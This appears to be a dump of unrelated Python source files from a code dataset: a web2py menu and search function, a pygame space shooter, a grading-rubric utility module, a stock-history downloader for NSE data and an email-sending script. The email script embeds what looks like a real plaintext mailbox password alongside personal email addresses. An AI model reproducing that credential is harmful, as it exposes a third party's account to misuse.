auth.has_membership(\"Super\"):\n\t\tsalida.append(itemmenus(\"ADMINISTRACION\",(\n\t\t\t\t\t\t(\"fas fa-users-cog fa-xs\",\"Administrar\",URL('administrar', 'index')),\n\t\t\t\t\t\t(\"fas fa-hammer fa-xs\",\"Parametros\",URL('parametros', 'index')),\n\t\t\t\t)))\n\tif auth.has_membership(\"Administradores\") or auth.has_membership(\"Super\") or auth.has_membership(\"Gerencia\"):\n\t\tsalida.append(itemmenus(\"MODULOS\",(\n\t\t\t\t\t(\"fab fa-telegram-plane fa-xs\",T('Comprobante de Pago a Proveedores'), URL('compegreso', 'index')),\n\t\t\t\t\t(\"fab fa-deploydog fa-xs\", T('Comprobante de Pago a Empleados'), URL('compnomina', 'index')),\n\t\t\t\t\t(\"fas fa-certificate fa-xs\",T('Certificación de Retención por IVA'), URL('retiva', 'index')),\n\t\t\t\t\t(\"fas fa-wallet fa-xs\",T('Ret. Fuente, Ret. ICA'), URL('compretencionanual', 'index')),\n\t\t\t\t\t(\"fas fa-wallet fa-xs\",T('Retención Dian'), URL('comp_dian', 'index')),\n \t\t\t\t)))\n\t#if auth.has_membership(\"Proveedor\") or auth.has_membership(\"Empleados\") or auth.has_membership(\"Super\"):\n\tsalida.append(itemmenus(\"DOCUMENTOS\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-book fa-xs\",T('Publicaciones'), URL('documentos', 'index')),\n\t\t)))\n\tif auth.has_membership(\"Super\"):\n\t\tsalida.append(itemmenus(\"GENERAL\",(\n\t\t\t\t\t\t\t\t\t(\"fas fa-radiation-alt\",T('Configuracion'), URL('cntrpal', 'index')),\n\t\t)))\n\n\n\tsalida.append(\n\t\tLI(XML(''),\n\t\t)\n\t)\n\treturn salida\n\n\ndef BuscarEnClientes(tipo):\n fecha_inicio=request.vars.fecha_inicio or None\n fecha_final=request.vars.fecha_final or None\n nit=request.vars.nit_correo or None\n salida=\"\"\n consulta =db.tbl_recepcion.tipdoc==tipo\n\n if fecha_inicio:\n fecha_inicio +=\" 00:00:00\"\n consulta &= db.tbl_recepcion.fechaenvio>=fecha_inicio\n if fecha_final:\n fecha_final += \" 23:59:59\"\n consulta &= db.tbl_recepcion.fechaenvio<=fecha_final\n\n subconsulta=None\n if nit:\n nit=f\"%{nit}%\"\n idclientes=db(db.tbl_cliente.nit.like(nit) | db.tbl_cliente.nombre.like(nit)).select(db.tbl_cliente.id)\n\n if idclientes:\n for idcliente in idclientes:\n if subconsulta:\n subconsulta |=db.tbl_recepcion.id_cliente==idcliente.id\n else:\n subconsulta =db.tbl_recepcion.id_cliente==idcliente.id\n else:\n salida =DIV(\"No se encontro la busqueda solicitada\",_class=\"alert alert-danger\", _role=\"alert\")\n return salida\n\n tempo =db.tbl_recepcion.estado==\"Q\"\n tempo |=db.tbl_recepcion.estado==\"T\"\n tempo |=db.tbl_recepcion.estado==\"F\"\n #### Nuevo\n consulta &=tempo\n if subconsulta: consulta &= subconsulta\n ####\n x=consulta\n consulta=db(consulta).select()\n tabla=TABLE(_class=\"table table-striped\")\n #tabla.append(THEAD(TR(TH(\"Empleados\"),TH(\"Doc. id\"), TH(\"Nro. Doc.\"), TH(\"Estado\"),TH(\"Fecha Envio\"), TH(\"Controles\"))))\n tabla.append(THEAD(TR(TH(\"Empleados\"),TH(\"Doc. id\"), TH(\"Nro. 
Doc.\"), TH(\"Fecha Envio\"), TH(\"Controles\"))))\n #tabla.append(TR(TD(fecha_inicio),TD(tempo), TD(x), TD(consulta)))\n for item in consulta:\n tabla.append(TR(TD(item.id_cliente.nombre),\n TD(item.id_cliente.nit),\n TD(item.nrodoc),\n #TD(T(item.tarea.status)),\n TD(item.fechaenvio),\n TD( SPAN (\n A(I(\" \",_class=\"far fa-file-pdf\"),_class=\"btn btn-sm btn-danger btn-circle text-white\",\n _onclick=\"ajax('{}',['superid'],':eval');$('#visorPDF').modal('show');\".format(URL(\"verpdf\",vars=dict(idpdf=item.id)))),\n _class=\"d-inline-block\", _tabindex=\"0\",_title=\"Ver Docmento\", **{'data-toggle':\"tooltip\", \"data-placement\":\"top\"}),\n \"|\",\n SPAN (A(I(\" \",_class=\"fas fa-mail-bulk\"),_class=\"btn btn-sm btn-success btn-circle btn text-white\",\n _onclick=\"$('#DialModal').modal('show');ajax('{}',['usrid'],':eval');\".format(URL('ReenvioCorreo',vars=dict(id_recepcion=item.id)))),\n _class=\"d-inline-block\", _tabindex=\"0\",_title=\"Reeviar Correo\", **{'data-toggle':\"tooltip\"}),\n _align=\"right\"\n )\n )\n )\n salida=tabla\n return salida\n","sub_path":"models/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175752693","text":"\"\"\"\n This will hold the information from Google Sheets Intra data\n\n\"\"\"\nfrom Classes.OLHBasicClass import OLHBasicClass\n\n\nclass OLHSheetsClass(OLHBasicClass): # pylint: disable=too-few-public-methods , too-many-arguments\n \"\"\"\n OLHSheetsClass\n\n \"\"\"\n def __init__(self, script, trade_time, p_open, high, low, ltp,volume, prev_close, cond):\n OLHBasicClass.__init__(self, script, trade_time, p_open,high ,low, ltp, volume, prev_close)\n self.cond = cond\n\n\n def __str__(self):\n ''' String representation of OLHSheetsClass '''\n olh_str = 'SCRIPT:{},OPEN={};HIGH={};LOW={};LTP={};PCLOSE={};Cond-{};'.format(\n self.script, self.p_open, self.high, self.low, self.ltp, self.pclose, self.cond\n )\n return olh_str\n\n def __repr__(self):\n ''' Representation of OLHSheetsClass '''\n olh_str = 'OLHSheetsClass({},{},{},{},{},{},{}'.format(\n self.script, self.p_open, self.high, self.low, self.ltp, self.pclose, self.cond\n )\n return olh_str\n\n\n\n","sub_path":"classes/OLHSheetsClass.py","file_name":"OLHSheetsClass.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"159526720","text":"import pygame\n\nfrom game import BossOne, Enemy, Menu, Meteor, Player, Spritesheet, settings\n\n\nclass Game(object):\n \"\"\"Intergalactic Uprising Game\"\"\"\n\n def __init__(self):\n \"\"\"Creates a new Game.\"\"\"\n pygame.init()\n pygame.mixer.init()\n pygame.mixer.music.load(settings.MAIN_THEME_SFX)\n pygame.mouse.set_visible(False)\n pygame.display.set_caption(\"Intergalactic Uprising\")\n self.screen = pygame.display.set_mode(\n (settings.WIDTH, settings.HEIGHT)\n )\n self.display = pygame.display.Info()\n self.load_resources()\n self.sprites = pygame.sprite.Group()\n self.players = pygame.sprite.Group()\n self.enemies = pygame.sprite.Group()\n self.bosses = pygame.sprite.Group()\n self.meteors = pygame.sprite.Group()\n self.shots = pygame.sprite.Group()\n self.enemies_shots = pygame.sprite.Group()\n self.explosions = pygame.sprite.Group()\n self.pows = pygame.sprite.Group()\n self.shields = pygame.sprite.Group()\n self.running = False\n self.clock = pygame.time.Clock()\n self.main_menu = Menu(self)\n 
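# show the main menu right away; Menu is assumed to call back into new()/run() once the player chooses to start\n        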
self.main_menu.draw()\n\n def new(self):\n \"\"\"Initializes a new game.\"\"\"\n self.sprites.empty()\n self.players.empty()\n self.enemies.empty()\n self.bosses.empty()\n self.meteors.empty()\n self.shots.empty()\n self.enemies_shots.empty()\n self.explosions.empty()\n self.pows.empty()\n self.shields.empty()\n self.mob_limit = 10\n self.enemies_remaining = 100\n self.player = Player(self, groups=[self.sprites, self.players])\n self.release_mobs()\n self.score = 0\n self.running = True\n\n def run(self):\n \"\"\"Game main loop.\"\"\"\n pygame.mixer.music.play(loops=-1)\n while self.running:\n self.clock.tick(settings.FPS)\n self.events()\n self.update()\n self.draw()\n self.over()\n pygame.mixer.music.fadeout(500)\n\n def events(self):\n \"\"\"Event handler.\n\n Decide which action perform based on window and keyboard events.\n \"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.running = False\n if event.key == pygame.K_RETURN and not self.player.alive():\n self.new()\n\n def update(self):\n \"\"\"Update sprites.\"\"\"\n self.sprites.update()\n\n def draw(self):\n \"\"\"Put everything on screen.\"\"\"\n self.fill_background()\n self.sprites.draw(self.screen)\n if settings.DEBUG:\n # Draw a red rectangle around each sprite for debugging.\n for sprite in self.sprites.sprites():\n pygame.draw.rect(self.screen, settings.RED, sprite.rect, 2)\n self.draw_text(str(self.score), (self.display.current_w / 2, 10))\n self.draw_bar((self.player.energy / 100), (75, 15))\n self.draw_lives()\n if not self.player.alive():\n # Show game over message.\n centerx = self.display.current_w / 2\n centery = self.display.current_h / 2\n self.draw_text(\n \"Game Over\", (centerx, centery - 48), settings.FONT_LG_SIZE\n )\n self.draw_text(\"[Return] play again.\", (centerx, centery + 24))\n self.draw_text(\"[Escape] main menu.\", (centerx, centery + 48))\n pygame.display.flip()\n\n def draw_text(\n self, text, pos, size=settings.FONT_SIZE, color=settings.WHITE\n ):\n \"\"\"Draws a text on screen.\n\n Args:\n text: The text string to be draw.\n pos: The X and Y positions on screen.\n size: Text size.\n color: Text color.\n \"\"\"\n font = pygame.font.Font(settings.FONT, size)\n surface = font.render(text, True, color)\n rect = surface.get_rect()\n rect.midtop = pos\n self.screen.blit(surface, rect)\n\n def draw_bar(self, percent, pos, color=None):\n \"\"\"Draws a status bar on screen.\n\n Args:\n percent: The percentage of the bar to be filled.\n pos: The X and Y positions on screen.\n color: The color for the filled area of the bar.\n \"\"\"\n x, y = pos\n width, height = 100, 10\n fill = percent * width\n if not color:\n if percent < 0.2:\n color = settings.RED\n elif percent < 0.5:\n color = settings.YELLOW\n else:\n color = settings.GREEN\n outline = pygame.Rect(x, y, width, height)\n filled = pygame.Rect(x, y, fill, height)\n pygame.draw.rect(self.screen, color, filled)\n pygame.draw.rect(self.screen, settings.WHITE, outline, 2)\n\n def draw_lives(self):\n \"\"\"Draws player's lives.\"\"\"\n icon_rect = self.player_ico_img.get_rect()\n icon_rect.center = (25, 20)\n lives = self.player.lives\n if lives:\n lives -= 1\n self.screen.blit(self.player_ico_img, icon_rect)\n self.draw_text(str(lives), (60, 10))\n\n def fill_background(self):\n \"\"\"Fill screen background.\"\"\"\n self.screen.fill(settings.BLACK)\n\n def spawn_enemy(self):\n \"\"\"Spawns a new enemy.\"\"\"\n if 
self.enemies_remaining:\n self.enemies_remaining -= 1\n Enemy(self, groups=[self.sprites, self.enemies])\n elif not self.bosses.sprites():\n BossOne(self, groups=[self.sprites, self.bosses])\n\n def spawn_meteor(self):\n \"\"\"Spawns a new meteor.\"\"\"\n Meteor(self, groups=[self.sprites, self.meteors])\n\n def release_mobs(self):\n \"\"\"Release the mobs.\n\n It will be 2/3 of enemies and 1/3 of meteors.\n \"\"\"\n enemies = int(self.mob_limit * 2 / 3)\n moteors = int(self.mob_limit / 3)\n for _ in range(enemies):\n self.spawn_enemy()\n for _ in range(moteors):\n self.spawn_meteor()\n\n def load_resources(self):\n \"\"\"Loads resource data like images and sfx.\"\"\"\n self.spritesheet = Spritesheet(settings.SPRITESHEET_IMG)\n self.player_spritesheet = Spritesheet(settings.PLAYER_SPRITESHEET_IMG)\n self.enemies_spritesheet = Spritesheet(\n settings.ENEMIES_SPRITESHEET_IMG\n )\n self.explosions_spritesheet = Spritesheet(\n settings.EXPLOSIONS_SPRITESHEET_IMG\n )\n self.player_img = [\n self.player_spritesheet.get_image(p) for p in settings.PLAYER_IMG\n ]\n self.player_ico_img = self.spritesheet.get_image(\n settings.PLAYER_ICO_IMG\n )\n self.enemies_img = [\n self.enemies_spritesheet.get_image(e) for e in settings.ENEMIES_IMG\n ]\n self.bosses_img = [\n self.spritesheet.get_image(b) for b in settings.BOSSES_IMG\n ]\n self.meteors_img = [\n self.spritesheet.get_image(m) for m in settings.METEORS_IMG\n ]\n self.explosions_img = [\n self.explosions_spritesheet.get_image(e)\n for e in settings.EXPLOSIONS_IMG\n ]\n self.pows_img = [\n self.spritesheet.get_image(p) for p in settings.POWS_IMG\n ]\n self.laser_img = [\n self.spritesheet.get_image(l) for l in settings.LASER_IMG\n ]\n self.shield_img = [\n self.spritesheet.get_image(s) for s in settings.SHIELD_IMG\n ]\n self.shot_sfx = pygame.mixer.Sound(settings.SHOT_SFX)\n self.killed_sfx = pygame.mixer.Sound(settings.KILLED_SFX)\n self.explosion_sfx = pygame.mixer.Sound(settings.EXPLOSION_SFX)\n self.hit_sfx = pygame.mixer.Sound(settings.HIT_SFX)\n self.pows_sfx = [pygame.mixer.Sound(s) for s in settings.POWS_SFX]\n\n def over(self):\n \"\"\"Checks if the game is over.\"\"\"\n if self.player.lives == 0 and not self.explosions.sprites():\n # Kill the player after losing all lives.\n self.player.kill()\n","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350403799","text":"# # напишите здесь функцию print_shopping_list(),\n# # подобрав уникальные названия продуктов и сложив значения\n# def print_shopping_list(pizza, salad):\n# key_pizza = set(pizza)\n# key_salad = set(salad)\n# union_key = key_pizza.union(key_salad)\n# #print(union_key)\n# count = 0\n#\n# for pozition in union_key:\n# for pozition_pizza, name_pizza in pizza.items():\n# for pozition_salad, name_salad in salad.items():\n# if pozition_pizza == pozition_salad == pozition:\n# count = name_pizza + name_salad\n# print(pozition, count)\n#\n# # else:\n# # print(pozition_pizza, name_pizza)\n# # #print(pozition_salad, name_salad)\n#\n#\n#\n# # for pozition_salad, name_salad in salad.items():\n# # if pozition_salad == pozition:\n# # count += name_salad\n# # print(pozition, name_salad)\n#\n# # def is_anyone_in(collection, city):\n# # if city in collection.values(): # если есть среди значений словаря collection\n# # print(city)\n# # for key, name in collection.items(): # переберите все ключи словаря\n# # if name == city: # если соответствующее ключу 
значение равно city\n# # print('В городе ' + city + ' живёт ' + key + '.')\n# # else:\n# # print('Пока никого.')\n#\n# # print(pizza.intersection(salad))\n#\n# pizza = {'мука, кг': 1,\n# 'помидоры, кг': 1.5,\n# 'шампиньоны, кг': 1.5,\n# 'сыр, кг': 0.8,\n# 'оливковое масло, л': 0.1,\n# 'дрожжи, г': 50}\n# salad = {'огурцы, кг': 1,\n# 'перцы, кг': 1,\n# 'помидоры, кг': 1.5,\n# 'оливковое масло, л': 0.1,\n# 'листья салата, кг': 0.4}\n#\n# print_shopping_list(pizza, salad)\n\n\n# напишите здесь функцию print_shopping_list(),\n# подобрав уникальные названия продуктов и сложив значения\ndef print_shopping_list(pizza, salad):\n\n sort_food = set(pizza)\n sort_food = sort_food.union(salad)\n\n for food in sort_food:\n weight = 0\n if food in pizza.keys():\n weight += pizza[food]\n if food in salad.keys():\n weight += salad[food]\n print(food,': ', weight, sep='')\n\npizza = {'мука, кг': 1,\n 'помидоры, кг': 1.5,\n 'шампиньоны, кг': 1.5,\n 'сыр, кг': 0.8,\n 'оливковое масло, л': 0.1,\n 'дрожжи, г': 50}\nsalad = {'огурцы, кг': 1,\n 'перцы, кг': 1,\n 'помидоры, кг': 1.5,\n 'оливковое масло, л': 0.1,\n 'листья салата, кг': 0.4}\n\nprint_shopping_list(pizza, salad)","sub_path":"sort_food.py","file_name":"sort_food.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"375262263","text":"import json\nimport os\nimport shutil\n\nfrom zipfile import ZipFile\nfrom datetime import datetime\nfrom slitools.infoutils import process_timestamp\n\n# Internal Constants\n_TYPE_SPECIFIER = '__type__'\n_PA_TIMESTAMP_FMT = '%A %x %X'\n_PA_LOCATION = os.path.join(os.path.expanduser('~'), '.sli-processed-archives-grading')\n_PA_JSON = os.path.join(_PA_LOCATION, '.processed.json')\n_PA_JSON_TMP = os.path.join(_PA_LOCATION, '.processed.json.tmp')\n\nLABEL_ASSIGNMENT_JSON = 'assignment.json'\n\nPROGRAM_DESC = {\n 'organize': \"A program that takes all zip files and attempts to extract them and create student \"\n \"directories as if they were dropbox zip files. The student directories are stored on a \"\n \"per assignment basis in the location given.\",\n 'analyze': \"A program that will verify submissions against a rubric from a json with the grader. If \"\n \"a program is misnamed a penalty is deducted according to the rubric. 
If it fails to run a penalty\"\n \"is deducted according to the rubric and so on.\"\n}\n\n\nclass TypedObject(object):\n def __init__(self, typed_object_type):\n self.__type__ = typed_object_type\n\n def get_type(self):\n return self.__type__\n\n def is_instance(self, obj):\n return isinstance(obj, TypedObject) and self.is_type(obj)\n\n def is_type(self, test):\n if isinstance(test, TypedObject):\n return self.__type__ == test.__type__\n elif isinstance(test, str):\n return self.__type__ == test\n else:\n return False\n\n\nclass ProcessedArchive(TypedObject):\n __type__ = 'ProcessedArchive'\n\n def __init__(self, key, value):\n super().__init__(ProcessedArchive.__type__)\n self._key = key\n self._value = value\n self._timestamp = datetime.now().strftime(_PA_TIMESTAMP_FMT)\n\n def key(self):\n return self._key\n\n def value(self):\n return self._value\n\n def path(self):\n return os.path.join(_PA_LOCATION, self.value())\n\n def timestamp(self):\n return self._timestamp\n\n def _update_time(self):\n self._timestamp = datetime.now().strftime(_PA_TIMESTAMP_FMT)\n\n def __str__(self):\n return \"{} ({}) : {}\".format(self.timestamp(), self.key(), self.value())\n\n\nclass Rubric(TypedObject):\n __type__ = 'Rubric'\n\n @staticmethod\n def _check_source_param(source_block):\n var1 = source_block['desc']\n var2 = source_block['value']\n\n return source_block\n\n @staticmethod\n def _check_func_param(source_block):\n var1 = source_block['command']\n var2 = source_block['desc']\n var3 = source_block['peanlty']\n var4 = source_block['value']\n\n def __init__(self, data):\n self.total = data['total']\n self.weight = data['weight']\n params = data['parameters']\n parent = None\n try:\n parent = 'parameters'\n self.due_date = process_timestamp(params['due_date']['time']) if 'time' in params['due_date'] else None\n self.due_penalty = params['due_date']['penalty'] if 'penalty' in params['due_date'] else 0\n self.problem_solving = params['problem_solving']\n self.in_lab = params['in_lab']\n self.output_check = params['output_check'] if 'output_check' in params else None\n\n parent += '.implementation' + '.functionality'\n impl_data = params['implementation']\n self.functionality = impl_data['functionality']\n\n if 'command' not in self.functionality or \\\n 'desc' not in self.functionality or \\\n 'penalty' not in self.functionality or \\\n 'value' not in self.functionality:\n raise KeyError('command or desc or penalty or value')\n\n self.required_files = impl_data['required_files']\n self.required_penalty = impl_data['required_files_penalty']\n\n parent = parent[:parent.rindex('.')]\n parent += '.source_code'\n source_data = impl_data['source_code']\n\n self.source_total = source_data['total']\n self.source_design = Rubric._check_source_param(source_data['design'])\n self.source_style = Rubric._check_source_param(source_data['style'])\n self.source_doc = Rubric._check_source_param(source_data['doc'])\n\n except KeyError as e:\n raise ValueError('Missing {} under {} in rubric!'.format(e.args[0], parent if parent else 'root'))\n\n super().__init__(Rubric.__type__)\n\n def has_output_check(self):\n return self.output_check is not None\n\n def has_due_date(self):\n return self.due_date is not None and self.due_penalty != 0\n\n\nclass Student(TypedObject):\n __type__ = 'Student'\n\n def __init__(self, name, submission_time, problem_solving=0, in_lab=0, funct=0, design=0, style=0, doc=0):\n super().__init__(Student.__type__)\n\n if isinstance(submission_time, str):\n submission_time = 
process_timestamp(submission_time)\n\n self.penalty = 0\n self._name = name\n self._submission = submission_time\n self._ps = problem_solving\n self._il = in_lab\n self._impl_total = funct + design + style + doc\n self._functionality = funct\n self._design = design\n self._style = style\n self._doc = doc\n self._late = False\n\n def init_to_rubric(self, rubric: Rubric):\n if rubric.has_due_date():\n if self._submission > rubric.due_date:\n self._late = True\n return\n\n self._ps = rubric.problem_solving\n self._il = rubric.in_lab\n self._functionality = rubric.functionality['value']\n self._design = rubric.source_design['value']\n self._style = rubric.source_style['value']\n self._doc = rubric.source_doc['value']\n self._impl_total = self._functionality + self._design + self._style + self._doc\n\n if self._impl_total + self._ps + self._il != rubric.total:\n raise RuntimeError('Invalid Rubric! Component Total != Rubric Total!')\n\n def name(self, new_name=None):\n if new_name:\n self._name = new_name\n\n return self._name\n\n def prob_solving(self, new_grade=None):\n if new_grade:\n self._ps = new_grade\n\n return self._ps\n\n def in_lab(self, new_grade=None):\n if new_grade:\n self._il = new_grade\n\n return self._il\n\n def submission_time(self):\n return self._submission\n\n def implementation(self):\n return self._functionality + self._design + self._style + self._doc\n\n def get_raw_points(self):\n return max(self.prob_solving() + self.implementation() + self.in_lab() - self.penalty, 0)\n\n def get_weighted(self, points_possible, weight_possible):\n return self.get_points(points_possible) * weight_possible\n\n def get_points(self, points_possible):\n return self.get_raw_points() / points_possible\n\n def __str__(self):\n return self.name()\n\n\nclass DefaultEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, datetime):\n return process_timestamp(o)\n else:\n return o.__dict__\n\n\ndef common_decoder(obj):\n if _TYPE_SPECIFIER in obj:\n if obj[_TYPE_SPECIFIER] == 'Student':\n return Student(obj['_name'], obj['_submission'], obj['_ps'], obj['_il'], obj['_functionality'],\n obj['_design'], obj['_style'], obj['_doc'])\n elif obj[_TYPE_SPECIFIER] == 'ProcessedArchive':\n return ProcessedArchive(obj['_key'], obj['_value'])\n\n return obj\n\n\ndef json_load_rubric(filename):\n with open(filename) as df:\n data = json.load(df)\n\n return data\n\n\ndef json_load_students(filename):\n with open(filename) as df:\n data = json.load(df, object_hook=common_decoder)\n\n return data\n\n\ndef json_write(data, filepath, indent=4):\n if isinstance(data, dict):\n data = json.dumps(data, cls=DefaultEncoder, indent=indent, sort_keys=True)\n elif isinstance(data, str):\n json.loads(data, object_hook=common_decoder)\n else:\n raise TypeError('Data is not a JSON String nor a Dictionary mapping str -> Any')\n\n with open(filepath, 'w') as json_file:\n json_file.write(data)\n\n\ndef json_read(filepath):\n with open(filepath, 'r') as json_file:\n data = json.load(json_file, object_hook=common_decoder)\n\n return data\n\n\ndef get_processed_archives():\n return json_read(_PA_JSON)['pa']\n\n\ndef process_archive(key, filename):\n pa = ProcessedArchive(key, filename)\n\n data = json_read(_PA_JSON)\n data['pa'][pa.key()] = pa\n\n json_write(data, _PA_JSON_TMP)\n\n mv_file(filename, _PA_LOCATION)\n mv_file(_PA_JSON_TMP, _PA_JSON)\n return pa\n\n\ndef extract_archive(filename, dest, pwd=None):\n with ZipFile(filename, 'r') as src_zip:\n for name in src_zip.namelist():\n src_zip.extract(name, dest, 
pwd)\n\n\ndef rm_file(filename):\n if os.path.exists(filename):\n os.remove(filename)\n\n\ndef mv_file(source, target):\n filename = os.path.basename(source)\n\n if not target.endswith('/' + filename):\n target += '/' + filename\n elif not target.endswith(filename):\n target += filename\n\n if os.path.exists(target):\n os.remove(target)\n\n shutil.move(source, os.path.dirname(target))\n\n\ndef cp_file(source, target):\n filename = os.path.basename(source)\n\n if not target.endswith('/' + filename):\n target += '/' + filename\n elif not target.endswith(filename):\n target += filename\n\n if os.path.exists(target):\n os.remove(target)\n\n shutil.copy(source, target)\n\n\ndef get_filename(path):\n return os.path.basename(os.path.splitext(path)[0])\n\n\ndef get_file_ext(path):\n return os.path.splitext(path)[1]\n\nif __name__ != '__main__':\n # Establish Archiving Location\n if not os.path.exists(_PA_LOCATION):\n os.makedirs(_PA_LOCATION)\n\n # Establish initial PA JSON file\n if not os.path.exists(_PA_JSON):\n json_write(\"{\\\"pa\\\":{}}\", _PA_JSON)","sub_path":"slitools/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":10097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"409794676","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@author: paul.xie\n@software: PyCharm\n@time: 2017/1/10 9:47\n\"\"\"\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nfrom email.mime.image import MIMEImage\nimport smtplib\nmsg = MIMEMultipart('Hello')\n\nme = \"xie_wei_sh@foxmail.com\"\nyou = \"paul.xie@chinascope.com\"\nmsg[\"From\"] = Header(\"xie_wei_sh@foxmail.com\") # // 这个表示邮件发送人显示的\nmsg[\"Subject\"] = Header(\"Python 爱好者\", 'utf-8') # // 邮件标题\nmsg[\"To\"] = Header(\"paul.xie@chinascope.com\") # 收件人\n\ntext = \"Hi!\\nHow are you?\\nHere is the link you wanted:\\nhttps://www.python.org\"\nhtml = \"\"\"\\\n\n \n \n
<html>\n  <head></head>\n  <body>\n    <p>Hi!<br>\n       How are you?<br>\n       Here is the <a href=\"https://www.python.org\">link</a> you wanted.\n    </p>\n  </body>\n</html>
\n \n\n\"\"\"\npart1 = MIMEText(text, \"plain\")\npart2 = MIMEText(html, \"html\")\nwith open(\"001.jpg\", 'rb') as image:\n img = MIMEImage(image.read())\n part3 = img\n msg.attach(part3)\n\n\nmsg.attach(part1)\nmsg.attach(part2)\n\nserver = smtplib.SMTP(\"smtp.qq.com\", 587)\nserver.set_debuglevel(1)\nserver.starttls()\nserver.login(me, password=\"********\")\nserver.sendmail(me, you, msg=msg.as_string())\nserver.quit()\n\n\n# // yagmail 发信方式\n\nimport yagmail\n\nyag = yagmail.SMTP(\n user=\"xie_wei_sh@foxmail.com\",\n password=\"mengwu19bang56en\",\n host=\"smtp.qq.com\",\n port=587\n)\n\nyag.send(to=\"paul.xie@chinascope.com\", subject=\"邮件测试\", contents=['Hello', \"001.jpg\", \"email.docx\", \"test.txt\", \"UserManual.pdf\"])\n","sub_path":"Learn/2017_01_10_1.py","file_name":"2017_01_10_1.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338192040","text":"import os.path\n\nfrom django.conf import settings\n\n# Application constants\nFILE_SELECT_DEFAULT = \"< Choose a file >\"\nDATA_FILE_PATH = os.path.join(settings.BASE_DIR, \"data\")\nFILE_SELECT_WIDGET_CLASS = \"custom-select bg-dark text-white h5 select-override\"\nCONTROL_PANEL_WIDGET_CLASS = \"card-label custom-select\"\nTRAINING_METHOD_CHOICES = [(\"Linear Regression\", \"Linear Regression\")]\nSPLITS_CHOICES = [(2, 2), (3, 3), (4, 4), (5, 5), (10, 10)]\nTRAINING_METHOD_INITIAL = \"Linear Regression\"\nSPLITS_INITIAL = 5\n","sub_path":"mlflow/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"119610445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:01:52 2017\n\n@author: Santosh Bag\n\"\"\"\nimport sys,csv\nimport nsepy\nimport datetime #import date, timedelta\nfrom pandas import DataFrame\nfrom sqlalchemy import create_engine\nimport mrigutilities\n\nnseStockList = open(\"F:/Mrig Analytics/Development/mrigAnalytics/notdownloaded.csv\",\"r\")\nerrorLog = open(\"errorLog.txt\",\"w\")\ntoday = datetime.datetime.now()\n#nseStockPrices = open(\"nseStockHistory.csv\",\"a+\")\n\ndata_folder = \"F:/Mrig Analytics/Development/data/\"\n\n#arguments = sys.argv[1:]\n\nstartdate= datetime.date(2018,1,2)\nenddate= datetime.date(2018,9,7)\n\n#startdate= datetime.date(int(arguments[0][0:4]),int(arguments[0][4:6]),int(arguments[0][6:8]))\n#enddate= datetime.date(int(arguments[1][0:4]),int(arguments[1][4:6]),int(arguments[1][6:8]))\nreader = csv.reader(nseStockList)\nstocks = [[row[1],row[0]] for row in reader]\n\n#stocks = nsepy.constants.symbol_list\n\nnseStockListLength = len(stocks)\nnseStocksDownloaded = 0\ncounter = 0\nwrite_counter = 0\nstocksdata = DataFrame()\n\nnseStockPrices = open(data_folder+\"nseStockHistory_\"+startdate.strftime(\"%d-%b-%Y\")+\"_\"+enddate.strftime(\"%d-%b-%Y\")+\".csv\",\"a+\")\n\nengine = mrigutilities.sql_engine()\ndisable_sql = \"alter table stock_history disable trigger return_trigger\"\nenable_sql = \"alter table stock_history enable trigger return_trigger\"\n\nengine.execute(disable_sql)\n#print(stocks)\n\n#engine = create_engine('postgresql+psycopg2://postgres:xanto007@localhost:5432/RB_WAREHOUSE')\n\ndatabase_cols = {'%Deliverble':'per_deliverable_volume'}\n\n#stocks = stocks[4:6]\nfor stock in stocks:\n #print(stock)\n counter = counter + 1\n #print(stock)\n if len(stocks) < 50:\n steps = len(stocks)\n else:\n steps = 50\n sys.stdout.write(\"\\r[%-*s] 
%d%%\" % (steps,'='*int(counter/(len(stocks)/steps)), int(100/len(stocks)*counter)))\n sys.stdout.flush()\n \n try:\n startdate = datetime.datetime.strptime(stock[1],'%m/%d/%y').date() + datetime.timedelta(days=1)\n \n stockdata = nsepy.get_history(symbol=stock[0],start=startdate,end=enddate)\n \n #print(stockdata)\n# if counter==1:\n# stocksdata = stockdata\n# else:\n print(stock)\n #print(stockdata)\n #stocksdata = stocksdata.append(stockdata)\n if stockdata.empty:\n errorLog.write(stock+\" not downloaded \\n\")\n else:\n nseStocksDownloaded = nseStocksDownloaded +1\n \n# if counter >=50:\n stockdata.index.rename('date',inplace=True)\n stockdata.rename(columns=lambda x: x.lower().replace(\" \",'_').replace('%deliverble','per_deliverable_volume'),inplace=True)\n # if write_counter >=1:\n stockdata.to_csv(nseStockPrices, header=False)\n stockdata.reset_index(level=0, inplace=True)\n stockdata = mrigutilities.clean_df_db_dups(stockdata,'stock_history',engine,dup_cols=[\"date\",\"symbol\",\"series\"],leftIdx=True)\n errorLog.write(stockdata[1]+\" already downloaded \\n\")\n stockdata = stockdata[0]\n \n stockdata.set_index('date',inplace=True)\n stockdata['close_adj'] = stockdata['close']\n stockdata['volume_adj'] = stockdata['volume']\n #print(stocksdata)\n stockdata.to_sql('stock_history',engine, if_exists='append', index=True)\n except:\n pass\nprint(str(nseStocksDownloaded) +\" Stocks 